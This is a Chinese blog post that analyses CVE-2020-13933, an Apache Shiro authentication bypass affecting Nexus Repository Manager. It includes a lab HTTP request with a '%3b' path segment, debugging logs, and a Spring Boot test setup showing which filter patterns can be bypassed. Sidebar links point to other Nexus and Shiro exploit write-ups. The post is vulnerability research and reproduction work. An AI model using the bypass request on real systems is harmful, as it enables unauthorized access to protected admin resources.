[CVE-2020-13933]Shiro权限绕过导致的Nexus漏洞

最新推荐文章于 2024-05-23 17:31:59 发布
最新推荐文章于 2024-05-23 17:31:59 发布
阅读量1.3k 收藏
点赞数
分类专栏: java Web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/109223600
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

参考:

  • https://support.sonatype.com/hc/en-us/articles/360053556313-CVE-2020-13933-Nexus-Repository-Manger-2-3-Shiro-Authentication-Bypass
  • https://issues.sonatype.org/browse/NEXUS-25086
  • https://help.aliyun.com/noticelist/articleid/1060730690.html
  • https://github.com/lyy289065406/CVE-2020-13933
  • https://github.com/sonatype/nexus-public/compare/release-3.26.1-02…release-3.27.0-03

影响版本:

  • Nexus Repository Manager 2 versions up to and including 2.14.18
  • Nexus Repository Manager 3 versions up to and including 3.26.1

找diff,搜shiro关键词,发现nexus把shiro的版本修改了。
在这里插入图片描述

尝试调试:
首先尝试这个请求:

GET /nexus/service/siesta/capabilities/%3b0002abde1d29011e HTTP/1.1
Host: 192.168.85.129:8081
Connection: close

控制台出现这个log

jvm 1    | 2020-11-13 02:56:00,809-0800 WARN  [qtp609773298-49] anonymous org.sonatype.nexus.plugins.siesta.AuthorizationExceptionMapper - (ID 4a182908-df0e-4fe9-8de7-650a9467a9ad) Response: [401] ErrorXO{id='4a182908-df0e-4fe9-8de7-650a9467a9ad', message='User is not permitted: nexus:capabilities:read'} mapped from org.apache.shiro.authz.AuthorizationException/User is not permitted: nexus:capabilities:read

于是找到这个异常org.apache.shiro.authz.AuthorizationException被new的地方,先定位到jar包:

/d/repos/nexus-2.14.13-01-bundle/nexus-2.14.13-01
$ grep -rn "org.apache.shiro.authz.AuthorizationException" *
Binary file nexus/WEB-INF/lib/shiro-core-1.3.2.jar matches

于是去IDEA下断点:
果然再次请求的时候,在这里停下了,
在这里插入图片描述
然后开始分析调用栈:

环境搭建

参考:

  • https://www.anquanke.com/post/id/216096
  • https://www.anquanke.com/post/id/218270

https://github.com/l3yx/springboot-shiro.git
修改pom.xml中的shiro版本为1.5.3,然后修改path mapping:

//    @GetMapping("/admin/page")
//    public String admin() {
//        return "admin page";
//    }

    @GetMapping("/admin/{name}")
    public String admin(@PathVariable String name) {
        return "admin page";
    }

注意这里的GetMapping设置的path是

/admin/{name}

而不是

/admin/page

(这样的配置无法绕过)
需要知道的是ShiroConfig.java中有这样的配置:

map.put("/admin/*", "authc");

注意这里是/admin/*而不是/admin/**。
在admin方法的return语句下断点。
在这里插入图片描述
进入到这里说明已经绕过了shiro的限制。

再次测试:
将配置设置为:

map.put("/admin/index/*", "authc");

然后GetMappings设置为:

/admin/index/{name}

依然可以绕过。
附两种不同的404页面(一个Spring的,一个Tomcat的)
在这里插入图片描述
在这里插入图片描述
而如果设置为:

map.put("/admin/index/**", "authc");

则使用/srpingboot-shiro-0.0.1-SNAPSHOT/admin/index/%3bpage无法绕过。

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10204),CVE-2020-11444 越权漏洞
weixin_44508748的博客
11-21 1817
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞CVE-2018-16621的绕过CVE-2020-10199:Nexus Repository Manager OSS/PRo <=3.21.1,需有低权限账号。 CVE-2020-10204:Nexus Repository Manager OSS/PRo <=3.21.1,需有管理员账号。
CVE-2020-13933: Apache Shiro 权限绕过漏洞分析
爱国小白帽
09-22 5630
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-092201 报告来源:360CERT 报告作者:360CERT 更新日期:2020-09-22 0x01 漏洞简述 2020年08月18日, 360CERT监测发现 Apache Shiro 发布了 Apahce Shiro 权限绕过 的风险通告,该漏洞编号为 CVE-2020-13933漏洞等级:高危,漏洞评分:8.0。 Apahce Shiro 由于处理身份验证请求时出错 存在 权限
【已复现】Sonatype Nexus Repository 3 路径遍历漏洞(CVE-2024-4956)安全风险通告
最新发布
smellycat000的专栏
05-23 187
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Sonatype Nexus Repository 3 路径遍历漏洞漏洞编号QVD-2024-18749,CVE-2024-4956公开时间2024-05-16影响量级十万级奇安信评级高危CVSS 3.1分数7.5威胁类型信息泄露利用可能性高POC状态已公开在野利用状态未发现EXP状态已公开技术细节状态已公开危害描述:未经身份认证的远程攻...
shiro历史漏洞分析—CVE-2020-11989/CVE-2020-13933
include_voidmain的博客
09-26 1550
shiro历史漏洞分析—CVE-2020-11989/CVE-2020-13933
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)环境搭建
aweiweiweiei1的博客
07-17 537
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)搭建的教程: https://www.cnblogs.com/backlion/p/14055278.html
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
shiro权限绕过漏洞分析(cve-2020-1957) _ Spoock1
08-03
然而,如标题和描述中提到的,存在一个名为CVE-2020-1957的安全漏洞,允许攻击者绕过Shiro权限检查,从而访问受保护的资源。 该漏洞主要发生在Shiro 1.5.1及更早版本中,当用户请求的URL(URL1)通过Shiro权限...
CVE-2020-16875: Microsoft Exchange远程代码执行漏洞通告
爱国小白帽
09-11 3555
360CERT [三六零CERT](javascript:void(0)???? 前天 报告编号:B6-2020-090902 报告来源:360CERT 报告作者:360CERT 更新日期:2020-09-09 0x01 漏洞简述 2020年09月09日,360CERT监测发现Microsoft Exchange 发布了 Exchange 命令执行漏洞 的风险通告,该漏洞编号为CVE-2020-16875 ,漏洞等级:严重,漏洞评分:9.1。 远程攻击者通过 构造特殊的cmdlet参数 ,可造成 任意命令
spring cloud 2020 云盘_Apache Shiro < 1.6.0 权限绕过漏洞CVE-2020-13933)风险通告
weixin_39713578的博客
11-27 313
2020年8月17日,Apache Shiro官方发布安全更新,修复了一个最新权限绕过漏洞。攻击者利用该漏洞可以绕过验证访问到后台功能,风险较高。【漏洞描述】2020年8月17日,Apache Shiro官方发布安全更新,修复了一个最新权限绕过漏洞。攻击者利用该漏洞可以绕过验证访问到后台功能,风险较高。攻击者可以使用包含payload的恶意请求绕过Shiro的身份认证,漏洞于1.5.3修复。实际上...
解决linux下使用root用户启动nexus报错Detected execution as root user. This is NOT recommended!的问题
文若书生的专栏
05-08 9329
在linux部署nexus使用root启动会报错Detected execution as “root” user. This is NOT recommended! 处理这个问题很容易,找到nexus-3.16.1-02/bin下nexus文件,vi编辑,将run_as_root=true改为run_as_root=true,再次启动就可以了。vi环境下可以使用/run_as_root搜索 ...
NEXUS使用的两点经验
weixin_40821669的博客
03-12 401
NEXUS使用的两点经验: 1)为什么maven下载下来有auth/AuthFaliure.class,直接上私服上找不到这个类? 2)3.x版本没有保存proxy包的工鞥呢,2.x版本有。所以需要下载代理包的,需要下载2.x版本。 1)答复: 在宿主hosted仓库里面有,因为宿主仓库里面已经存在相同版本名字的jar包,所以优先下载宿主仓库里的jar包。而宿主仓库里的jar包是自定义的,增加了这...
Apache Shiro 身份验证绕过漏洞复现(CVE-2020-13933)
m0_65150886的博客
01-02 520
之前Apache Shiro身份验证绕过漏洞CVE-2020-11989的修复补丁存在缺陷,在1.5.3及其之前的版本,由于shiro在处理url时与spring仍然存在差异,依然存在身份校验绕过漏洞由于处理身份验证请求时出错,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。2.不在请求中指定资源名称时,不去触发身份验证,也没有任何资源返回。4.构造特定 PoC 请求指定资源时,不触发身份验证,并绕过权限。3.访问身份验证页面,在请求中指定资源名称时,
漏洞复现】CVE-2020-29436:Nexus3 XML外部实体注入
zzgslh的博客
02-05 1353
一、 Nexus简介 Nexus Repository Manager 3是一款通用的软件包仓库管理(Universal Repository Manager)服务。 二、漏洞概述 三、漏洞复现 提示:本地搭建需要JDK1.8以上版本。 (1)下载Nexus Repository Manager 3.28.1-01环境: 链接地址:https://help.sonatype.com/repomanager3/download/download-archives—repository-manager-3 (
Nexus 3 任意修改admin密码越权漏洞
Lemon1006的博客
07-04 1566
个人博客:https://blog.gxzhang.cn 请大家多多关照呀 0x01 编号:CVE-2020-11444 漏洞影响版本范围和危害是和CVE-2020-10199、CVE-2020-10204前后一个月时间出现的,爆出了10199和10204后面的一个补丁修复之后,再次爆出的11444漏洞Nexus 3 任意修改admin密码越权漏洞,可以用低权限用户登录获取sessionID越权进行修改admin用户的密码 0x02 首先,通过CVE-2020-10199登录admin.
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10204)
EC_Carrot的博客
07-15 352
漏洞复现 Nexus Repository Manager 3的3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞CVE-2018-16621的绕过漏洞需要访问更新角色或创建角色接口,所以我们需要登陆后台 登陆后台后获取当前Cookie和CSRF Token,并修改以下包: POST /service/extdirect HTTP/1.1 Host: your_ip:8081 Content-Length: 223 X-Requested-With: XMLHttpRequest X-
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2020-10204 漏洞复现
ADummy的博客
03-03 568
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10204) by ADummy 0x00利用路线 ​ 登录抓包—>获取cookie和csrf token—>burpsuite发包—>命令执行 0x01漏洞介绍 ​ Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞CVE-2018-16621的绕过
CVE-2020-13933
08-10
CVE-2020-13933是Apache Shiro中的一个高危漏洞漏洞评分为8.0。该漏洞存在权限绕过的风险,可能导致未经授权的访问和执行某些受限资源的问题。具体来说,该漏洞涉及到Shiro的过滤器链调用机制。在Shiro的拦截器链中,通过使用特定的配置和路径匹配功能,攻击者可以绕过权限验证并执行未授权的操作。这可能会导致系统安全性受到威胁。 建议受影响的用户及时更新Apache Shiro到最新版本,以修复该漏洞。此外,还应该审查和加强系统的访问控制和权限验证机制,以防止未经授权的访问和操作。123 #### 引用[.reference_title] - *1* *2* *3* [CVE-2020-13933: Apache Shiro 权限绕过漏洞分析](https://blog.csdn.net/weixin_45728976/article/details/108737882)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值